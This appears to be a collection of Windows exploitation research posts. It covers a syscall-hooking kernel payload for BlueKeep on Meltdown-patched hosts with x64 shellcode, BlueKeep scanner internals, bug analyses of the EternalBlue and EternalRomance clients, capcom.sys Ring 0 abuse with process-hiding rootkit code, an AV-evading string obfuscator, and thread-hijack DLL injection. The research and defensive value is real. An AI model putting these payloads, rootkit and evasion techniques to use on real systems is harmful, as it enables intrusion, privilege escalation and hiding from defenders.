tl;dr: Side effects of the Meltdown patch inadvertently breaks the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU VulnerabilityΒ 

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors are loading and evaluating and branching ("speculating") way before these operations are "actually" to be run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, exploitation of Meltdown can be abused to read kernel memory from a rogue userland process.

KVA ShadowΒ 

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow ChangesΒ 

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
  • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  • Load kernel stack from KPCR->Prcb.RspBaseShadow
  • The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel PayloadsΒ 

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSRΒ 

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause AnalysisΒ 

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with a UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64ShadowΒ 

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset DetectionΒ 

    We want to accomplish two things:

    1. Install our hook in a spot after kernel pages CR3 is loaded.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2-bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:


    payload_start:
    ; read IA32_LSTAR
    mov ecx, 0xc0000082
    rdmsr

    shl rdx, 0x20
    or rax, rdx
    push rax

    ; rsi = &KiSystemCall64Shadow
    pop rsi

    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
    xor ecx, ecx
    mov ebx, 0x652b6a00

    _find_push2b_loop:
    inc ecx
    cmp ebx, dword [rsi + rcx - 1]
    jne _find_push2b_loop

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

    Atomic x64 Function HookingΒ 

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b function!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:


    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:

    ; 0x905748bf = nop; push rdi; movabs rdi &fake_syscall_hook;
    mov dword [rsi - 0x10], 0xbf485790
    lea rdi, [rel fake_syscall_hook]
    mov qword [rsi - 0xc], rdi

    ; 0x57c3 = push rdi; ret;
    mov word [rsi - 0x4], 0xc357

    ; ...

    fake_syscall_hook:

    ; ...

    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.


    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:

    ; rsi = &syscall+push2b
    add rsi, rcx

    ; eax = jmp -x
    ; fix -x to actual offset required
    mov eax, 0xfeeb
    shl ecx, 0x8
    sub eax, ecx
    sub eax, 0x1000

    ; push 2b => jmp -x;
    mov word [rsi], ax

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call: the kernel stack and page tables will be loaded, our small jmp hook will goto big jmp which will goto our fake syscall handler at PASSIVE_LEVEL.

    Cleaning Up the HookΒ 

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:


    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:

    ; save all volatile registers
    push rax
    push rbp
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11

    mov rbp, STAGE_SHARED_MEM

    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
    jnz _restore_syscall

    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
    sti
    call r0_to_r3
    cli

    ; all threads can clean up
    _restore_syscall:

    ; calculate offset to 0x2b using shared storage
    mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
    mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
    add rdi, rax

    ; atomic change small jmp to push 2b
    mov word [rdi], 0x2b6a

    All threads restore the push 2b, as the code flow results in less bytes, no extra locking, and shouldn't matter.

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.


    _syscall_hook_done:

    ; restore register values
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

    ; rdi still holds push2b offset!
    ; but needs to be restored

    ; do not cause bugcheck 0xc4 arg1=0x91
    mov qword [rsp-0x20], rdi
    pop rdi

    ; return to &KiSystemCall64Shadow+push2b
    jmp [rsp-0x28]

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    ConclusionΒ 

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    Avoiding the DoS: How BlueKeep Scanners Work

    BackgroundΒ 

    On May 21, @JaGoTu and I released a proof-of-concept GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

    Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

    Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

    RDP Channel InternalsΒ 

    The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

    The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

    There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

    That should be enough information to follow the rest of this post. More background information is available from ZDI.

    MS_T120 I/O Completion PacketsΒ 

    After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

    The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

    Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

    MS_T120 Port Data DispatchΒ 

    On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

    We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

      0x0 - rdpwsx!HandleConnectProviderIndication
      0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

    If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

    Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

    Patch DetectionΒ 

    I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

    It's real simple: If you send a MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper clean up. There should not be risk of denial-of-service.

    The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

    Vulnerable Host BehaviorΒ 

    On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

    And of course, with an invalid size, you RCE/BSoD.

    Patched Host BehaviorΒ 

    However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

    In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.

    CPU Architecture DifferencesΒ 

    Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, which one might think sending both at once should cause the denial-of-service.

    Simply, besides the sizes being different, the message opcode is in a different offset. So on the opposite architecture, with a 0'd out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding. The message for another architecture will just be ignored.

    This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

    ConclusionΒ 

    This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

    Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

    It is my knowledge that the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

    Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

    See Also: Dissecting a Bug in the EternalRomance Client (FuzzBunch)

    BackgroundΒ 

    Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP for a time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

    Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

    Why did this exploit work in the wild but not against runs in my "lab"?

    tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs causes FuzzBunch's XP payload to abort prematurely on single-core installs.

    Multiple Exploit ChainsΒ 

    Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

    But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

    tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

    Payload MethodologyΒ 

    As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch's payload.

    The main stages of the ring 0 shellcode performs the following actions:

    1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
    2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
    3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
    4. Runs DoublePulsar to backdoor the SMB service
    5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

    Single Core Branch AnomalyΒ 

    Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.


    kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

    The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

    Presumably, this function will be called to clean up the semi-corrupted KPRCB.

    The single-core machine did not find hal!HalInitializeProcessor... sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

    Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

    Root Cause AnalysisΒ 

    The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

    There is an issue in the kernel shellcode that does not take into account all of the different types of the NT kernel executables are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

    The NT Red HerringΒ 

    The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

    On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

    However, on single-core installations this is not a HAL import table, but instead a string table:

    At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.

    Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

    This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

    HAL Variation Byte TableΒ 

    Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

    The desired 5 bytes are easily found in the multi-core version of HAL:

    However, the function on single-core HAL is much different.

    There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

    ConclusionΒ 

    It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

    It is very curious that the KdVersionBlock trick and a byte sequence search is used to find functions in this payload. The Windows 7 payload finds NT and its exports in, as seen, a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

    This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

    There is circumstantial evidence that primary FuzzBunch development was started in late 2001. The payload seems maybe it was only written for and tested against multi-core processors? Perhaps this could be a indicator as to how recent the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

    This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

    Dissecting a Bug in the EternalRomance Client (FuzzBunch)

    Note: This post does not explain the EternalRomance exploit chain, just a quirky bug in the Equation Group's client. For comprehensive exploit details, come see my presentation at DEF CON 26 (August 2018).


    Background

    In SMBv1, transactions are looked up via their User ID, Tree ID, Process ID, and Multiplex ID fields (UID, TID, PID, MID). This allows a client to have many transactions running at once, as needed. UID and TID are server-assigned, and PID is client-set but usually static. Generally, a client will only use the MID, set to a random value, to distinguish distinct transactions.

    Fish in a Barrel

    In EternalRomance, the MID must be set to a specific value (File ID). In order for the Equation Group to multiplex multiple transactions, the PID is used instead. The PID is what separates "dynamite sticks" in the Fish-In-A-Barrel heap feng shui.

    Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 
    Figure 1. Fish in a Barrel (Red: Dynamite - Blue: Fish)

    Dynamite are transactions that can (ideally) cause overflow into another transaction. Sometimes a dynamite stick fails, simply because memory allocations can be volatile. In this case, EternalRomance should try the next stick.

    Discovering the Bug

    I had nop'd out the Srv.sys vulnerability being exploited using WinDbg so that I could observe the network traffic during failures and other various reasons.

    I noticed that EternalRomance, during the grooming phase, sent dynamite sticks with PIDs 0, 1, and 2. However, it was only attempting to ignite one PID (dynamite stick) for every execution attempt. The PID 0.

    This must be a mistake because igniting the same dynamite 3 times in a row does absolutely nothing but send superfluous network traffic with no change in result. A dynamite stick either works or it simply always will be a dud. And besides, why did it bother to send the other 2 dynamite in the first place?

    In fact, igniting the same dynamite stick multiple times is dangerous, because it increments a pointer each time, and the offset for the overwrite (a neighboring MID) stays static. On a side note, I also noticed the first exploit attempt always tries to overwrite two bytes, and all secondary dynamite attempts only overwrite one byte. Because of the way they set up the exploit, only a one byte overwrite is necessary (though two bytes won't hurt if it hits the right place). Another peculiarity.

    I messed around with the MaxExploitAttempt settings, which has a default value of 3. I set it to its maximum allowed of 16. Now the PID started at 3?

    This time, PIDs 3 through 15 were observed, and the last 3 exploit attempts sent PID=0.

    The Binary is Truth

    Well some debugging later, I figured out that the InitializeParameters() function (there are no symbols in the binary, but a few functions have helpful debug strings when handling error conditions) was allocating two arrays for the dynamite stick PIDs.


    unsigned int size = ExploitStruct->MaxExploitAttempts_0x4360;

    if (size {
    ExploitStruct->PidTable_0x44a0 = (PWORD) TbMalloc(2 * size);
    ExploitStruct->PidTable_0x44a4 = (PWORD) TbMalloc(2 * size);
    }
    else
    {
    // print error message: too many max exploit attempts
    }

    TbMalloc is Equation Group's library function (tibe-2.dll) that just calls malloc() and then memset() to 0 (essentially calloc() but with one argument).

    I set a hardware breakpoint on the tables and noticed that in SmbRemoteApiTransactionGroom() (another unnamed function) there was the following logic. This function completes when the dynamite are initially sent (before any are ignited).


    if (DynamiteNum >= 3)
    {
    ExploitStruct->PidTable_0x44a4[DynamiteNum - 3] = DynamitePid;
    }
    else
    {
    ExploitStruct->PidTable_0x44a0[DynamiteNum] = DynamitePid;
    }

    Later, in DoWriteAndXExploitTransactionForRemApi(), the table where DynamiteNum >= 3 is used to source PIDs to ignite the dynamite.

    This means PidTable_0x44a4 is never given values when MaxExploitAttempts=3. Observe 3 shorts set to 0 at the address in the dump.

    And we can see the cause for the quirky behavior of the network traffic starting at PID=3, when MaxExploitAttempts=16 (or any greater than 3). Observe several shorts incrementing from 3, followed by three 0.

    As far as I can tell, the PidTable_0x44a0 table (the one that holds the first 3 PIDs) simply isn't used, at least when tested against several versions of Windows XP and Server 2003.

    Conclusion

    This bug was probably missed, by both analysts and the Equation Group, for a few reasons:

    • Fish in a Barrel is only used for older versions of Windows (it's fixed in 7+)
    • It almost always succeeds the first time, as it is a rarely used pre-allocated heap
    • TbMalloc initializes all PID to 0, and the first dynamite PID is 0
    • The bug is quite subtle, I missed it several times because of assumptions

    The real mystery is why is there this logic for the second table that isn't used?

    Obfuscated String/Shellcode Generator - Online Tool



    String Shellcode |

    Shellcode will be cleaned of non-hex bytes using the following algorithm:


    s = s.replace(/(0x|0X)/g, "");
    s = s.replace(/[^A-Fa-f0-9]/g, "");

    See also: Overflow Exploit Pattern Generator - Online Tool.

    About this tool

    I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

    Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do this similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

    This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

    Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

    Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

    Update July 3, 2017: FuzzySec has also previously written some info about this.

    Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings , and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

    Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

    But why waste 0-days when you can use kn0wn-days?

    Premise

    1. If you're running as an elevated admin, you're allowed to load (signed) drivers.
      • Local users are almost always admins.
      • UAC is known to be fundamentally broken.
    2. Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
      • It's a fairly obvious idea, and elementary to perform.
      • Windows does not have robust certificate revocation.
        • Thus, the DSE trust model is fundamentally broken!

    Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

    This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

    That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

    oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe

    β€” slipstream/RoL (@TheWack0lian) September 23, 2016

    Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

    The unfortunate part is it can still be easily loaded and exploited to this day.

    My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.

    β€” Matt Graeber (@mattifestation) June 24, 2017

    If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seems bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

    Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

    While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

    Proof of Concept

    Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

    Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

    1: kd> dt !_EPROCESS ActiveProcessLinks
    +0x2e8 ActiveProcessLinks : _LIST_ENTRY

    For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple, doing something interesting once there is more difficult (e.g. we can already load drivers, the usual SYSTEM shell can be obtained through less dangerous methods).

    I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.


    static void rootkit_unlink(PEPROCESS pProcess)
    {
    static const DWORD WIN10_RS3_OFFSET = 0x2e8;

    PLIST_ENTRY plist =
    (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

    *((DWORD64*)plist->Blink) = (DWORD64)plist->Flink;
    *((DWORD64*)plist->Flink + 1) = (DWORD64)plist->Blink;

    plist->Flink = (PLIST_ENTRY) &(plist->Flink);
    plist->Blink = (PLIST_ENTRY) &(plist->Flink);
    }

    Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

    DOUBLEPULSAR showed us there's a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

    If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

    ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()

    In the attempt to evade AV, attackers go to great lengths to avoid the common reflective injection code execution function, CreateRemoteThread(). Alternative techniques include native API (ntdll) thread creation and user APCs (necessary for SysWow64->x64), etc.

    This technique uses SetThreadContext() to change a selected thread's registers, and performs a restoration process with NtContinue(). This means the hijacked thread can keep doing whatever it was doing, which may be a critical function of the injected application.

    You'll notice the PoC (x64 only, #lazy) is using the common VirtualAllocEx() and WriteVirtualMemory() functions. But instead of creating a new remote thread, we piggyback off of an existing one, and restore the original context when we're done with it. This can be done locally (current process) and remotely (target process).

    Stage 0: Thread Hijack

    Code can be found in hijack/hijack.c

    1. Select a target PID.
    2. Process is opened, and any thread is found.
    3. Thread is suspended, and thread context (CPU registers) copied.
    4. Memory allocated in remote process for reflective DLL.
    5. Memory allocated in remote process for thread context.
    6. Set the thread context stack pointer to a lower address.
    7. Change thread context with SetThreadContext().
    8. Resume the thread execution.

    Stage 1: Reflective Restore

    Code can be found in dll/ReflectiveDll.c

    1. Normal reflective DLL injection takes place.
    2. Optional: Spawn new thread locally for a primary payload.
    3. Optional: Thread is restored with NtContinue(), using the passed-in previous context.

    You can go from x64->SysWow64 using Wow64SetThreadContext(), but not the other way around. I unfortunately did not observe possible sorcery for SysWow64->x64.

    One major hiccup to overcome, in x64 mode, is that the register RCX (function param 1) is volatile even across a SetThreadContext() call. To overcome this, I stored a cave (in this case, the DOS header). Luckily, NtContinue() allows setting the volatile registers, so there's no issues in the restoration process, otherwise it would have needed a hacky code cave inserted or something.


    // retrieve CONTEXT from DOS header cave
    lpParameter = (LPVOID)*((PULONG_PTR)((LPBYTE)uiLibraryAddress+2));

